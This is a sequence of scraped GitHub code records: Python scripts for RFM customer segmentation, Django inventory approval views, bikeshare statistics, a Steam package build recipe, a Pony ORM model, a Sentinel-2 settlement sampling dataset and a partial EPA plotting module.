[0,30,90,180,360,720]\r\nF_bins = [1,2,5,10,20,5000]\r\nM_bins = [0,55,2000,5000,10000,200000]\r\nR_score = pd.cut(R_value,R_bins,labels=[5,4,3,2,1],right=False)\r\n#print(R_score)\r\nF_score = pd.cut(F_value,F_bins,labels=[1,2,3,4,5],right=False)\r\nM_score = pd.cut(M_value,M_bins,labels=[1,2,3,4,5],right=False)\r\nrfm = pd.concat([R_score,F_score,M_score],axis=1)\r\n#print(F_score.shape,M_score.shape,R_score.shape)\r\n# print(rfm)\r\nrfm.rename(columns={'date':'R_score','InvoiceNo':'F_score','amount':'M_score'},inplace=True)\r\nfor i in ['R_score','F_score','M_score']:\r\n rfm[i] = rfm[i].astype(float)\r\nrfm['R'] = np.where(rfm['R_score']>3.82,'高','低')\r\nrfm['F'] = np.where(rfm['F_score']>2.03,'高','低')\r\nrfm['M'] = np.where(rfm['M_score']>1.8,'高','低')\r\nrfm['value'] = rfm['R'].str[:] +rfm['F'].str[:] + rfm['M'].str[:]\r\n#print(rfm.info())\r\ndef trans_value(x):\r\n if x == '高高高':\r\n return '重要价值客户'\r\n elif x=='高低高':\r\n return '重要发展客户'\r\n elif x== '低高高':\r\n return '重要保持客户'\r\n elif x== '低低高':\r\n return '重要挽留客户'\r\n elif x=='高高低':\r\n return '一般价值客户'\r\n elif x== '高低低':\r\n return '一般发展客户'\r\n elif x=='低高低':\r\n return '一般保持客户'\r\n else:\r\n return '一般挽留客户'\r\n\r\nrfm['用户等级'] = rfm['value'].apply(trans_value)\r\nrfm['用户等级'].value_counts()\r\ntrade_basic = [go.Bar(x = rfm['用户等级'].value_counts().index, y=rfm['用户等级'].value_counts().values,marker = dict(color='orange'),opacity=0.50)]\r\nlayout = go.Layout(title='用户等级情况',xaxis = dict(title='用户重要度'))\r\nfigure_basic = go.Figure(data= trade_basic,layout=layout)\r\npy.plot(figure_basic)\r\n# trace = [go.Pie(labels= rfm['用户等级'].value_counts().index, values=rfm['用户等级'].value_counts().values,textfont=dict(size=12,color='white'))]\r\n# layout2 = go.Layout(title='用户等级比例')\r\n# figure_basic2 = go.Figure(data= trace,layout=layout2)\r\n# py.plot(figure_basic2)\r\n\r\n#结论和建议\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"HarCP3/data-analysis","sub_path":"ecommerce.py","file_name":"ecommerce.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26621470227","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, generics, permissions, views, exceptions, response\n\nfrom . import models as inv_model\nfrom . import serializers as inv_serializer\n\nfrom account.models import UserMixIn\nfrom account.permissions import IsStoreManager\n\n\nclass InventoryView(viewsets.ModelViewSet):\n model = inv_model.Inventory\n queryset = model.objects.all()\n serializer_class = inv_serializer.InventorySerilizer\n\n def perform_create(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.CREATE\n serializer.save()\n\n def perform_update(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.UPDATE\n serializer.save()\n\n def perform_destroy(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.DELETE\n serializer.save()\n\n\nclass AccepetRejectInventory(views.APIView):\n \"\"\" accept or reject inventory\"\"\"\n permission_classes = (\n permissions.IsAuthenticated, IsStoreManager,\n )\n\n def post(self, request, *args, **kwargs):\n action_name = kwargs['action_type']\n try:\n inventory = inv_model.Inventory.objects.get(id=kwargs['id'])\n except inv_model.Inventory.DoesNotExist:\n raise exceptions.ParseError({'details':\"Invalid id\"})\n \n if action_name == \"accept\":\n update_data = inventory.update_data\n for key, value in update_data:\n setattr(inventory, key, value)\n inventory.status = inv_model.Inventory.ACCEPT\n inventory.save()\n else:\n inventory.status = inv_model.Inventory.PENDING\n inventory.save()\n return response.Response({'details': \"Inventroy updated successfully.\"})\n","repo_name":"aman0511/coin-drive-test","sub_path":"inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"4331740108","text":"import time\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nCITY_DATA = {'chicago': 'chicago.csv',\r\n 'new york city': 'new_york_city.csv',\r\n 'washington': 'washington.csv'}\r\n\r\n\r\ndef get_filters():\r\n \"\"\"\r\n Asks user to specify a city, month, and day to analyze.\r\n\r\n Returns:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n \"\"\"\r\n print('Hello! Let\\'s explore some US bikeshare data!')\r\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle\r\n while True:\r\n city = input(\"\\nEnter the name of city you need (chicago, new york city, washington):\").lower()\r\n if city in ['chicago', 'new york city', 'washington']:\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid city name\")\r\n\r\n # TO DO: get user input for month (all, january, february, ... , june)\r\n while True:\r\n month = input(\"\\n Enter which month you need ( january, february, march, april, may, june) Or (all) to all monthes :\").lower()\r\n if month in ('all', 'january', 'february', 'march', 'april', 'may', 'june'):\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid month name\")\r\n\r\n # get user input for day of week (all, monday, tuesday, ... sunday)\r\n while True:\r\n day = input(\"\\n Enter which day you need (monday, tuesday, wednesday, thursday, friday, saturday, sunday) Or (all) to all days :\").lower()\r\n if day in ('all', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'):\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid day name\")\r\n\r\n print('-'*40)\r\n return city, month, day\r\n\r\n\r\ndef load_data(city, month, day):\r\n \"\"\"\r\n Loads data for the specified city and filters by month and day if applicable.\r\n\r\n Args:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n Returns:\r\n df - Pandas DataFrame containing city data filtered by month and day\r\n \"\"\"\r\n# i used it from project 3\r\n# load data file into a dataframe\r\n df = pd.read_csv(CITY_DATA[city])\r\n\r\n # convert the Start Time column to datetime\r\n df['Start Time'] = pd.to_datetime(df['Start Time'])\r\n\r\n # extract month , day and hour of week from Start Time to create new columns\r\n df['month'] = df['Start Time'].dt.month\r\n df['day_of_week'] = df['Start Time'].dt.weekday_name\r\n df['start hour'] = df['Start Time'].dt.hour\r\n\r\n # filter by month if applicable\r\n if month != 'all':\r\n # use the index of the months list to get the corresponding int\r\n months = ['january', 'february', 'march', 'april', 'may', 'june']\r\n month = months.index(month) + 1\r\n\r\n # filter by month to create the new dataframe\r\n df = df[df['month'] == month]\r\n\r\n # filter by day of week if applicable\r\n if day != 'all':\r\n # filter by day of week to create the new dataframe\r\n df = df[df['day_of_week'] == day.title()]\r\n\r\n return df\r\n\r\n\r\ndef time_stats(df):\r\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\r\n\r\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: display the most common month\r\n print(\" \\nMost common month is:\", df['month'].mode()[0])\r\n\r\n # TO DO: display the most common day of week\r\n print(\" \\nMost common day is:\", df['day_of_week'].mode()[0])\r\n\r\n # TO DO: display the most common start hour\r\n print(\" \\nMost common start hour is:\", df['start hour'].mode()[0])\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef station_stats(df):\r\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\r\n\r\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\r\n start_time = time.time()\r\n # TO DO: display most commonly used start station\r\n print(\"\\n Most commonly used start station is:\",df['Start Station'].mode()[0])\r\n\r\n # TO DO: display most commonly used end station\r\n print(\"\\n Most commonly used end station is:\", df['End Station'].mode()[0])\r\n\r\n # TO DO: display most frequent combination of start station and end station trip\r\n df['start_to_end'] = df['Start Station']+' ' + df['End Station']\r\n most_start_toend = df['start_to_end'].mode()[0]\r\n print(\"\\n Most frequent combination of start station and end station trip:\", most_start_toend)\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef trip_duration_stats(df):\r\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\r\n\r\n print('\\nCalculating Trip Duration...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: display total travel time\r\n print(\"\\n Total travel time:\", df['Trip Duration'].sum())\r\n\r\n # TO DO: display mean travel time\r\n print(\"\\n Mean travel time:\", df['Trip Duration'].mean())\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef user_stats(df):\r\n \"\"\"Displays statistics on bikeshare users.\"\"\"\r\n\r\n print('\\nCalculating User Stats...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: Display counts of user types\r\n try:\r\n print(\"\\n Gender\", df['Gender'].value_counts())\r\n except:\r\n print(\"\\n Ops,there is no data about gender in this city\")\r\n\r\n # TO DO: Display earliest, most recent, and most common year of birth\r\n try:\r\n print(\"\\nEarliest common year of birth\", int(df['Birth Year'].min()))\r\n except:\r\n print(\"\\n Ops,there is no data about year of birth in this city\")\r\n\r\n try:\r\n print(\"\\nMost recent common year of birth\",int(df['Birth Year'].max()))\r\n except:\r\n print(\"\\n Ops,there is no data about year of birth in this city\")\r\n\r\n try:\r\n print(\"\\nMost common common year of birth\",int(df['Birth Year'].mode()[0]))\r\n except:\r\n print(\"\\n Ops, there is no data about year of birth in this city\")\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef display_rows(df):\r\n # ask user to display 5 rowes of data\r\n x = 0\r\n while True:\r\n ask = input(\"Are you need to display next 5 rows of data?\\n choice(yes or no):\").lower()\r\n if ask != 'yes' and ask != 'no':\r\n print(\"\\n Ops ,wrong choice,pleas choice (yes or not)\")\r\n elif ask == 'no':\r\n break\r\n else:\r\n if x+5 < df.shape[0]:\r\n print(df.iloc[x:x+5])\r\n x += 5\r\n\r\n\r\ndef main():\r\n while True:\r\n city, month, day = get_filters()\r\n df = load_data(city, month, day)\r\n\r\n time_stats(df)\r\n station_stats(df)\r\n trip_duration_stats(df)\r\n user_stats(df)\r\n display_rows(df)\r\n\r\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\r\n if restart.lower() != 'yes':\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"AhmedAbdelhamed01/Bikeshare-Data","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"3887481233","text":"metadata = \"\"\"\nsummary @ Digital distribution client bootstrap package\nhomepage @ http://steampowered.com/\nlicense @ custom\nsrc_url @ http://repo.steampowered.com/steam/pool/steam/s/steam/steam_1.0.0.50.tar.gz\narch @ ~x86_64\noptions @ nls static-libs threads\n\"\"\"\n\nstandard_procedure = False\n\nsrcdir =\"%s\" %name\n\ndef prepare():\n patch(level=1)\n\n\ndef build():\n make()\n \n \ndef install():\n raw_install('DESTDIR=%s' % install_dir)\n # insdoc('AUTHORS', 'LICENSE', 'NEWS', 'README', 'THANKS')\n","repo_name":"wdysln/new","sub_path":"app-games/steam/steam-1.0.0.50.py","file_name":"steam-1.0.0.50.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"34696255666","text":"from pony.orm import Required, Database, set_sql_debug\n\nfrom settings import DB_CONFIG\n\ndb = Database()\n# PostgreSQL\ndb.bind(**DB_CONFIG)\n\n\nclass UserTasks(db.Entity):\n user_id = Required(int)\n name = Required(str)\n date = Required(str)\n task = Required(str)\n\n\ndb.generate_mapping(create_tables=True)\nset_sql_debug(True)\n# UserTasks.get(user_id = 123321)\n","repo_name":"kallarias/tg_bot","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"16269580977","text":"import torch\nimport rasterio as rio\nimport pandas as pd\nimport geopandas as gpd\nimport os\nfrom skimage.morphology import binary_opening\nimport numpy as np\nfrom rasterio import features\nfrom shapely.geometry import shape\nfrom shapely.geometry import Polygon\n\nfrom itertools import product\nimport numpy as np\nimport geopandas as gpd\nfrom torch.utils.data import Dataset\nfrom glob import glob\nfrom torchvision.transforms import Resize\nimport torchvision\nimport rasterio\nfrom torchvision.transforms.functional import resize\nimport numpy as np\nfrom scipy.stats import skewcauchy\nfrom tqdm import tqdm\nfrom copy import copy\n\nBANDS = [\"B01\", \"B02\", \"B03\", \"B04\", \"B05\", \"B06\", \"B07\", \"B08\", \"B8A\", \"B09\", \"B10\", \"B11\", \"B12\"]\n\ndef load_s2_image(imagepath, bounds, expected_image_size):\n left, bottom, right, top = bounds\n\n # extract bands and image sizes\n band_stack = []\n for band in BANDS:\n with rasterio.open(os.path.join(imagepath, band + \".jp2\")) as src:\n patch_window = rasterio.windows.from_bounds(left, bottom, right, top, src.transform)\n band_stack.append(src.read(1, window=patch_window))\n\n # extract dimensions of the B02.jpg band (10m) to rescale other images to this size\n height, width = band_stack[1].shape\n\n size_in_px = expected_image_size // 10\n if height == size_in_px and width == size_in_px:\n\n # bilinearly interpolate all bands to 10m using torch functional resize\n band_stack = [\n resize(torch.from_numpy(b[None].astype(\"int32\")), [height, width]).squeeze(0).numpy() for b in band_stack\n ]\n\n # stack to image [13 x H x W]\n image = np.stack(band_stack)\n\n # valid pixels are where there is no 0 in all bands\n invalid_mask = image.sum(0) == 0\n\n if not np.isnan(image).any():\n\n if not invalid_mask.any():\n\n # prepare metadata for storing a georeferenced patch on disk\n\n # extract transform of the window from a 10m band\n with rasterio.open(os.path.join(imagepath, BANDS[1] + \".jp2\")) as src:\n patch_window = rasterio.windows.from_bounds(left, bottom, right, top, src.transform)\n win_transform = src.window_transform(patch_window)\n profile = src.profile\n profile[\"width\"], profile[\"height\"], profile[\"count\"] = width, height, len(BANDS)\n profile[\"transform\"] = win_transform\n\n return image, profile\n\n # if image not in correct size or contains invalid data\n return None, None\n\nclass SettlementDataset(Dataset):\n def __init__(self, data_path,\n tile,\n imagesize=640, # imagesize in meter\n segmentation=False,\n overwrite=False\n ):\n # prepare data (is skipped if already present)\n mosaik(data_path=data_path, tile=tile, overwrite=overwrite)\n write_urban_tif_and_shape(data_path, tile, overwrite=overwrite)\n\n # initialization\n self.index = gpd.read_file(os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.shp\"), index_col=0)\n self.imagepath = os.path.join(data_path, \"Test\", tile, \"mosaik\")\n self.imagesize = imagesize\n self.segmentation = segmentation\n\n if segmentation:\n gdf = gpd.read_file(os.path.join(data_path, \"Test\", tile, \"labels\", \"vector\", f\"{tile}.shp\"))\n self.shapes = gdf.loc[gdf[\"a_name\"] == \"Urban\"]\n\n print(\"checking samples...\")\n valid = [self[i] is not None for i in tqdm(range(len(self)))]\n self.index = self.index.loc[np.array(valid)]\n print(f\"dropping {(~np.array(valid)).sum()} invalid samples\")\n\n\n def __len__(self):\n return len(self.index)\n\n def __getitem__(self, item):\n geometry = self.index.iloc[item].geometry\n x,y = geometry.centroid.x, geometry.centroid.y\n\n left, bottom, right, top = x, y, x + self.imagesize, y + self.imagesize\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(self.imagepath, bounds, expected_image_size=self.imagesize)\n\n # stop early if loading failed (is checked for \"checking samples above\")\n if s2 is None:\n return None\n\n if self.segmentation:\n targets = rio.features.rasterize(self.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n return s2, targets, meta\n else:\n return s2, meta\n \n \n def get_image(self, cx, cy, imagesize):\n\n left, bottom, right, top = cx - imagesize // 2, cy - imagesize // 2, cx + imagesize // 2, cy + imagesize // 2\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(self.imagepath, bounds, expected_image_size=imagesize)\n\n targets = rio.features.rasterize(self.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n\n return s2, targets, meta\n \ndef get_center(m):\n pixel_size = m[\"transform\"].a\n x = m[\"transform\"].c\n y = m[\"transform\"].f\n\n cx = x + m[\"width\"] // 2 * pixel_size\n cy = y - m[\"height\"] // 2 * pixel_size\n return cx, cy\n\n\ndef make_grid(polygon, edge_size):\n \"\"\"\n polygon : shapely.geometry\n edge_size : length of the grid cell\n from https://stackoverflow.com/questions/68770508/st-make-grid-method-equivalent-in-python/68778560#68778560\n \"\"\"\n bounds = polygon.bounds\n x_coords = np.arange(bounds[0] + edge_size / 2, bounds[2], edge_size)\n y_coords = np.arange(bounds[1] + edge_size / 2, bounds[3], edge_size)\n combinations = np.array(list(product(x_coords, y_coords)))\n squares = gpd.points_from_xy(combinations[:, 0], combinations[:, 1]).buffer(edge_size / 2, cap_style=3)\n return gpd.GeoSeries(squares[squares.intersects(polygon)])\n\ndef write_urban_tif_and_shape(data_path, tile, urban_class=7,\n erosion_size=3, overwrite=False,\n simplify_radius=10, edge_size = 640):\n \"\"\"\n creates a raster file of urban areas only. these areas are eroded by a certain amount\n creates a shapefile of settlements by vectoriting the eroded raster file\n \"\"\"\n\n labels_tif = os.path.join(data_path, \"Test\", tile, \"labels\", \"raster\", f\"{tile}.tif\")\n target_tif = os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.tif\")\n target_shp = os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.shp\")\n\n os.makedirs(os.path.dirname(target_tif), exist_ok=True)\n\n if os.path.exists(target_tif) and os.path.exists(target_shp) and not overwrite:\n print(f\"files {target_tif} and {target_shp} exist. skipping, specificy overwrite=True to rewrite\")\n return\n\n with rio.open(labels_tif, \"r\") as src:\n lab = (src.read(1) == urban_class)\n lab = binary_opening(lab, footprint=np.ones((erosion_size, erosion_size)))\n lab = np.nan_to_num(lab, nan=255)\n\n profile = src.profile\n profile.update(\n dtype=\"uint8\",\n nodata=\"255\"\n )\n\n with rio.open(target_tif, \"w\", **profile) as dst:\n dst.write(lab, 1)\n print(f\"wrote {target_tif}\")\n\n shapes = features.shapes((lab == 1).astype(\"uint8\"), transform=src.transform)\n\n geoms = [Polygon(record[\"coordinates\"][0]) for (record, i) in shapes]\n gdf = gpd.GeoDataFrame(geometry=geoms, crs=profile[\"crs\"])\n b = gdf.iloc[-1]\n boundary = gpd.GeoDataFrame([1], geometry=[b.geometry], crs=profile[\"crs\"])\n gdf = gdf.iloc[:-2]# drop last row, as it is a polygon of the entire image\n gdf = gdf.dissolve().explode(index_parts=True)\n if simplify_radius > 0:\n gdf.geometry = gdf.geometry.simplify(simplify_radius) # simplify at 10m resolution to avoid pixel corners\n\n # split large polygons into smaller ones\n geometries = []\n for (_, idx), row in gdf.iterrows():\n if row.geometry.area > edge_size**2:\n geoms = make_grid(row.geometry, edge_size=edge_size)\n geoms = gpd.GeoSeries(geoms, crs=profile[\"crs\"])\n split_idx = list(geoms.index)\n geoms.index = [f\"{idx}-{i}\" for i in split_idx]\n geometries.append(geoms)\n else:\n _, idx = row.name\n series = gpd.GeoSeries(row, crs=profile[\"crs\"])\n series.index = [f\"{idx}-0\"]\n geometries.append(series)\n blocks = pd.concat(geometries)\n\n gdf = gpd.clip(blocks, gdf, keep_geom_type=True)\n #msk = (gdf.geometry.type == \"Polygon\") | (gdf.geometry.type == \"MultiPolygon\")\n #multipolys = gdf.loc[]\n #gdf = gdf.loc[msk] # removing GeometryCollections\n\n gdf.to_file(target_shp)\n print(f\"wrote {target_shp}\")\n\ndef mosaik(data_path, tile, overwrite=False):\n target_path = os.path.join(data_path, \"Test\", tile, \"mosaik\")\n os.makedirs(target_path, exist_ok=True)\n bands = glob(os.path.join(data_path, \"Test\", tile, \"*\", \"B*.jp2\"))\n scene = [b.split(\"/\")[-2] for b in bands]\n b = [b.split(\"/\")[-1].replace(\".jp2\", \"\") for b in bands]\n df = pd.DataFrame([bands, scene, b], index=[\"path\", \"scene\", \"band\"]).T\n for band in BANDS:\n trg_file = os.path.join(target_path, f\"{band}.jp2\")\n if os.path.exists(trg_file) and not overwrite:\n print(f\"{trg_file} exists. skipping. specify overwrite=True to regenerate mosaik\")\n continue\n\n df_ = df.loc[df.band == band]\n\n arrs = []\n for idx, row in df_.iterrows():\n with rio.open(row.path, \"r\") as src:\n arrs.append(src.read(1))\n profile = src.profile\n\n arrs = np.stack(arrs).astype(\"float16\")\n arrs[arrs == 0] = np.nan\n mosaik = np.nan_to_num(np.nanmin(arrs,axis=0)).astype(\"uint16\")\n\n with rio.open(trg_file, \"w\", **profile) as dst:\n dst.write(mosaik, 1)\n print(f\"writing {trg_file}\")\n\ndef sample_settlements(data_source,\n target_index,\n num_samples=50,\n dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000),\n return_idx_p=False,\n seed=0):\n # makes sure p sums to one\n def normalize(x):\n return (x / x.sum())\n\n target_sample = data_source.index.iloc[target_index]\n geom = target_sample.geometry\n x, y = geom.centroid.x, geom.centroid.y\n\n distances = []\n for idx, row in data_source.index.iterrows():\n c = row.geometry.centroid\n cx, cy = c.x, c.y\n distances.append(np.sqrt((x - cx) ** 2 + (y - cy) ** 2))\n distances = np.array(distances)\n\n p = normalize(dist_rv.pdf(distances))\n\n idxs = np.random.RandomState(seed).choice(np.arange(len(data_source)), replace=False, p=p, size=num_samples)\n\n batch = np.stack([data_source[idx] for idx in idxs])\n\n\n\n if data_source.segmentation:\n X,y, meta = map(list, zip(*batch))\n batch = (np.stack(X), np.stack(y), meta)\n else:\n batch = np.stack(batch)\n\n if return_idx_p:\n return batch, idxs, p\n else:\n return batch\n \ndef sample_negatives(data_source,\n target_index,\n num_samples=50,\n dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000),\n seed=0):\n # makes sure p sums to one\n segmentation = data_source.segmentation\n\n imagesize = data_source.imagesize\n imagepath = data_source.imagepath\n\n target_sample = data_source.index.iloc[target_index]\n geom = target_sample.geometry\n cx, cy = geom.centroid.x, geom.centroid.y\n\n # sample polar coordinates\n n_coordinates = num_samples*4 # sample more coordinates in case some are invalid\n distances = dist_rv.rvs(n_coordinates, random_state=seed)\n angles = np.random.RandomState(seed).randn(n_coordinates) * 2 * np.pi\n\n X = cx + distances * np.cos(angles)\n Y = cy + distances * np.sin(angles)\n\n batch = []\n targets = []\n metas = []\n for x,y in zip(X,Y):\n left, bottom, right, top = x, y, x + imagesize, y + imagesize\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(imagepath, bounds, expected_image_size=imagesize)\n if s2 is not None: # if valid\n\n if segmentation:\n t = rio.features.rasterize(data_source.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n targets.append(t)\n\n batch.append(s2)\n metas.append(meta)\n\n # stop early if sufficient valid samples have been found\n if len(batch) >= num_samples:\n break\n\n if segmentation:\n return np.stack(batch), np.stack(targets), metas\n else:\n return np.stack(batch), metas\n\ndef sample_batch(data_source, target_index, num_shots=10, dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000)):\n num_shots_pos, num_shots_neg = num_shots\n \n pos_batch = sample_settlements(data_source, target_index=target_index, num_samples=num_shots_pos, dist_rv=dist_rv)\n neg_batch = sample_negatives(data_source, target_index=target_index, num_samples=num_shots_neg, dist_rv=dist_rv)\n\n if not data_source.segmentation:\n pos_target = np.ones(pos_batch.shape[0], dtype=int)\n neg_target = np.zeros(pos_batch.shape[0], dtype=int)\n\n return np.vstack([pos_batch, neg_batch]), np.hstack([pos_target, neg_target])\n\n else:\n pos_X, pos_target, pos_meta = pos_batch\n neg_X, neg_target, neg_meta = neg_batch\n\n return np.vstack([pos_X, neg_X]), np.vstack([pos_target, neg_target]), pos_meta + neg_meta\n\n\ndef load_uc2_settlement_data(\n num_shots=(200, 600),\n imagesize=10240,\n target_index=600,\n datapath=\"/data/RepreSent/UC2\",\n savepath=None,\n use_cache=False): # f\"/home/marc/Desktop/uc2_settlements/{target_index}\"\n \n if use_cache and savepath is not None:\n data = torch.load(os.path.join(savepath, 'data.npz'))\n return data[\"X\"], data[\"Y\"], data[\"x_test\"], data[\"y_test\"], data[\"buildings\"], data[\"meta\"]\n\n ds = SettlementDataset(datapath, \"37LBL\", segmentation=True)\n\n x, y, meta_ = ds[target_index]\n cx, cy = get_center(meta_)\n\n x_test, y_test, meta = ds.get_image(cx, cy, imagesize=imagesize)\n\n labelprofile = copy(meta)\n labelprofile.update(\n count=1)\n\n dist = skewcauchy(a=0.999, loc=7500, scale=10000)\n print(\"sampling batch\")\n X, Y, train_metas = sample_batch(ds, target_index=target_index, num_shots=num_shots, dist_rv=dist)\n\n X = torch.from_numpy(X) * 1e-4\n Y = torch.from_numpy(Y)\n\n if savepath is not None:\n os.makedirs(savepath, exist_ok=True)\n\n #gdf.to_file(os.path.join(savepath, \"traintiles.shp\"))\n\n with rio.open(os.path.join(savepath, \"sentinel2.tif\"), \"w\", **meta) as dst:\n dst.write(x_test.astype(\"uint16\"))\n\n with rio.open(os.path.join(savepath, \"existing_labels.tif\"), \"w\", **labelprofile) as dst:\n dst.write(y_test.astype(\"uint16\"), 1)\n\n gdf = gpd.read_file(os.path.join(savepath, \"settlements.shp\"))\n with rio.open(os.path.join(savepath, \"sentinel2.tif\"), \"r\") as src:\n buildings = rio.features.rasterize(gdf.to_crs(src.crs).geometry, out_shape=(src.width, src.height),\n transform=src.transform, all_touched=True)\n\n torch.save(dict(\n X=X,\n Y=Y,\n x_test=x_test,\n y_test=y_test,\n buildings=buildings,\n meta=meta),\n os.path.join(savepath, 'data.npz'))\n\n return X, Y, x_test, y_test, buildings, meta\n\ndef main():\n import matplotlib.pyplot as plt\n from skimage.exposure import equalize_hist\n\n # SEGMENTATION\n plt.tight_layout()\n plt.show()\n\n ds = SettlementDataset(\"/data/RepreSent/UC2\", \"37LBL\", segmentation=True)\n X,Y = sample_batch(ds, target_index=200)\n\n fig, axs = plt.subplots(X.shape[0], 2, figsize=(3*2, 3*X.shape[0]))\n for x,y, axs_row in zip(X,Y, axs):\n ax = axs_row[0]\n ax.imshow(equalize_hist(x[np.array([3, 2, 1])]).transpose(1, 2, 0))\n ax.set_xticks([])\n ax.set_yticks([])\n\n ax = axs_row[1]\n ax.imshow(y)\n ax.set_xticks([])\n ax.set_yticks([])\n\n plt.tight_layout()\n plt.show()\n\n # CLASSIFICATION\n ds = SettlementDataset(\"/data/RepreSent/UC2\", \"37LBL\", segmentation=False)\n X,Y = sample_batch(ds, target_index=200)\n\n fig, axs = plt.subplots(X.shape[0], 1, figsize=(3, 3*X.shape[0]))\n for x,y, ax in zip(X,Y, axs):\n ax.imshow(equalize_hist(x[np.array([3, 2, 1])]).transpose(1, 2, 0))\n ax.set_title(\"settlement\" if y == 1 else \"non-settlement\")\n ax.set_xticks([])\n ax.set_yticks([])\n\nif __name__ == '__main__':\n main()\n","repo_name":"ridvansalihkuzu/representlib","sub_path":"represent/datamodules/uc2_settlement_module.py","file_name":"uc2_settlement_module.py","file_ext":"py","file_size_in_byte":17004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"18401814855","text":"from cConstants import cEPAConstants\nfrom cEnum import eEPA\nimport cPlot3D\n\n\nclass cPlotFrame(cPlot3D.cPlotFrame):\n def __init__(self, iParent, **kwargs):\n cPlot3D.cPlotFrame.__init__(self, iParent, **kwargs)\n\n def initPanel(self, *args, **kwargs):\n self.m_PlotPanel = cPlotPanel(self, **kwargs)\n\n\nclass cPlotPanel(cPlot3D.cPlotPanel):\n\n def __init__(self, iParent, iXAxisItem=eEPA.evaluation, iYAxisItem=eEPA.potency, iZAxisItem=eEPA.activity, iPlotType=eEPA.fundamental, **kwargs):\n cPlot3D.cPlotPanel.__init__(self, iParent, **kwargs)\n\n self.m_XAxisItem = iXAxisItem\n self.m_YAxisItem = iYAxisItem\n self.m_ZAxisItem = iZAxisItem\n\n self.m_PlotType = eEPA.fundamental\n\n\n def getSentimentEPAIndex(self, iEPA, iSentiment):\n return iEPA + (cEPAConstants.m_Dimensions * iSentiment)\n\n\n # Axis items are the enumerations of the elements in eEPA, so they're basically numbers\n def setAxis(iXAxisItem, iYAxisItem, iZAxisItem):\n self.m_XAxisItem = iXAxisItem\n self.m_YAxisItem = iYAxisItem\n self.m_ZAxisItem = iZAxisItem\n\n\n def plotEPA(self, iLearnerSamples, iSimulatorSamples):\n self.clearAxes()\n\n if (0 < len(iLearnerSamples)):\n # Learner's sentiments on self and other, green and pink respectively\n self.plotScatter(\n 